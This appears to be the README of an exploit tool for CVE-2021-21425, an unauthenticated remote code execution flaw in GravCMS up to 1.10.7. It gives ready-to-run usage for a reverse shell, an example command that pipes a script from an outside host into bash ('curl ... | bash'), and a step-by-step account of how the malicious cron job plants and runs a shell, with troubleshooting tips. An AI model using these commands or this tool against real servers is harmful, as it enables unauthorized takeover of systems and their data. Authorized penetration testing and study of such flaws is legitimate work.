Unauthenticated Remote Code Execution exploit for GravCMS <= 1.10.7 via arbitrary YAML write to the scheduler.
This is an improved version of EDB-49973. The original exploit requires manual editing of hardcoded values in the script. This version adds proper CLI arguments and automatic base64 encoding of payloads.
Improvements over original:
- Command-line arguments for target, LHOST, LPORT
- Automatic base64 encoding of reverse shell payload
- Custom command support (`-c`)
- Proper error handling and status output
| Field | Value |
|---|---|
| CVE | CVE-2021-21425 |
| EDB-ID | 49973 |
| Affected | GravCMS <= 1.10.7 |
| Type | Unauthenticated RCE |
| CVSS | 9.8 (Critical) |
The Grav Admin plugin fails to verify authentication on certain admin routes, allowing unauthenticated users to write arbitrary YAML configuration. This exploit abuses the scheduler configuration to create a cron job that executes arbitrary PHP code.
Usage:

```bash
# Reverse shell
python3 exploit.py -t http://target -s <LHOST> <LPORT>

# Custom command
python3 exploit.py -t http://target -c "id"
```

Examples:

```bash
# Get reverse shell on target
python3 exploit.py -t http://10.10.10.5 -s 10.10.14.5 4444

# Execute command
python3 exploit.py -t http://grav.local:8080 -c "curl http://10.10.14.5/shell.sh | bash"
```

Requirements:

```bash
pip install requests
```

How it works:
- Fetches `/admin` to extract the `admin-nonce` token (no auth required due to the vulnerability)
- Sends a POST to `/admin/config/scheduler` with a malicious cron job configuration
- The scheduler executes the PHP payload via `/usr/bin/php -r eval(base64_decode(...))`
- PHP writes the base64-decoded reverse shell to `/tmp/rev.sh` and executes it
The job is scheduled for every minute (`* * * * *`), so the shell should arrive within 60 seconds. If it does not, two things are worth checking: Grav's scheduler only fires when the host's crontab actually invokes `bin/grav scheduler` (Grav's own setup instructions have the operator install that entry; without it the job is saved but never runs), and the target needs `/usr/bin/php` and `bash` at the paths the payload assumes. The job also stays in the scheduler configuration after the shell connects, so it re-executes every minute until it is removed.
Timeline:
- 2021-03-29 - Disclosed by Mehmet Ince
- 2021-04-01 - Patched in Grav Admin Plugin
For authorized security testing only. Ensure you have written permission before testing against any system.